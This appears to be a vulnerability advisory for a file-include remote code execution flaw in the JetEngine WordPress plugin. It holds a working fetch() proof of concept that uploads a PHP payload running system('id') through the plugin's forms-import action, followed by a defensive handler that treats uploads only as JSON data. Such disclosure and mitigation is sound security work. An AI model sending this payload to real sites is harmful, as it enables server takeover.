The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.
Proof of Concept - JetEngine Author+ Include() RCE
fetch("/wp-admin/admin.php?action=jet_engine_forms_import", {
    "headers": {
        "accept": "text/html",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s"
    },
    "body": "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name=\"form_file\"; filename=\"poc.php\"\r\nContent-Type: application/json\r\n\r\n<?php die(system('id'));\r\n------WebKitFormBoundary5hcKRhxO2OVXJm3s--\r\n",
    "method": "POST",
    "credentials": "include"
}).then(response => response.text()).then((data) => console.log(data));
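
The root cause described above is that an uploaded file reaches include(). The handler below is an added example, not JetEngine's code or its actual fix, showing an import path that treats the upload purely as data. It assumes the export format is JSON; the action name, nonce name, capability and size cap are hypothetical, and only the `form_file` field name comes from the request above.

```php
<?php
// Added example, not JetEngine's code. The action name, nonce name, capability
// and size cap are assumptions; 'form_file' is the field from the request above.

/**
 * Read an uploaded form export strictly as data.
 *
 * @param array $file One entry of $_FILES.
 * @return array|WP_Error Decoded export, or the reason it was rejected.
 */
function example_read_form_export( array $file ) {
	if ( ! isset( $file['error'], $file['tmp_name'] )
		|| UPLOAD_ERR_OK !== $file['error']
		|| ! is_uploaded_file( $file['tmp_name'] ) ) {
		return new WP_Error( 'example_upload', 'Upload failed.' );
	}
	if ( filesize( $file['tmp_name'] ) > 1024 * 1024 ) { // assumed 1 MiB cap
		return new WP_Error( 'example_size', 'Export file is too large.' );
	}
	// Read the bytes. Nothing that arrived from a client is ever passed to
	// include/require, so a PHP payload in the file is inert text.
	$raw = file_get_contents( $file['tmp_name'] );
	if ( false === $raw ) {
		return new WP_Error( 'example_read', 'Could not read the upload.' );
	}
	$data = json_decode( $raw, true );
	if ( ! is_array( $data ) ) {
		return new WP_Error( 'example_format', 'File is not a JSON export.' );
	}
	return $data;
}

// Hypothetical import endpoint: /wp-admin/admin.php?action=example_forms_import
add_action( 'admin_action_example_forms_import', function () {
	if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
		wp_die( 'You are not allowed to import forms.', 403 );
	}
	check_admin_referer( 'example_forms_import' ); // CSRF nonce check
	$export = example_read_form_export( $_FILES['form_file'] ?? array() );
	if ( is_wp_error( $export ) ) {
		wp_die( $export );
	}
	// $export is a plain array; validate its keys before creating anything.
} );
```

With this handler the request body shown above is rejected as a non-JSON export, and a file that does parse as JSON is still only decoded, never executed.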